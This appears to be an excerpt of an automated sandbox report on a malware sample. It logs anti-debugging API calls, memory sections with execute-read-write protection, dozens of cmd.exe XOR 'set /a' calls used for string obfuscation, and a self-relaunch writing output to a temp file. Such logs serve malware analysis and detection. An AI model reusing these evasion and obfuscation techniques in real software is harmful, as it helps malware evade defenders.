Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Code function: 130_2_367B2639 IsProcessorFeaturePresent,LdrInitializeThunk,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,LdrInitializeThunk
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Code function: 130_2_367B2B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Code function: 130_2_367B60E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter

              HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Section loaded: NULL target: C:\Users\user\Desktop\asXlZG3aW6.exe protection: execute and read and write
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Section loaded: NULL target: C:\Users\user\Desktop\asXlZG3aW6.exe protection: execute and read and write
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Section loaded: NULL target: C:\Users\user\Desktop\asXlZG3aW6.exe protection: execute and read and write
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177"
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "227^177"
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "253^177"
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "130^177"
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "131^177"
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "242^177"
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "208^177"
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "197^177"
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "247^177"
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "221^177"
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "240^177"
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "153^177"
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "220^177"
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "133^177"
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177"
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "201^177"
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "137^177"
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "227^177"
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "137^177"
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "130^177"
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "227^177"
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "221^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "220^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "130^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "240^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "240^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "247^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "242^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "208^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "221^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "137^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "201^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "242^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "240^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "130^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Users\user\Desktop\asXlZG3aW6.exe C:\Users\user\Desktop\asXlZG3aW6.exe /stext "C:\Users\user\AppData\Local\Temp\yiydflrlgx"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
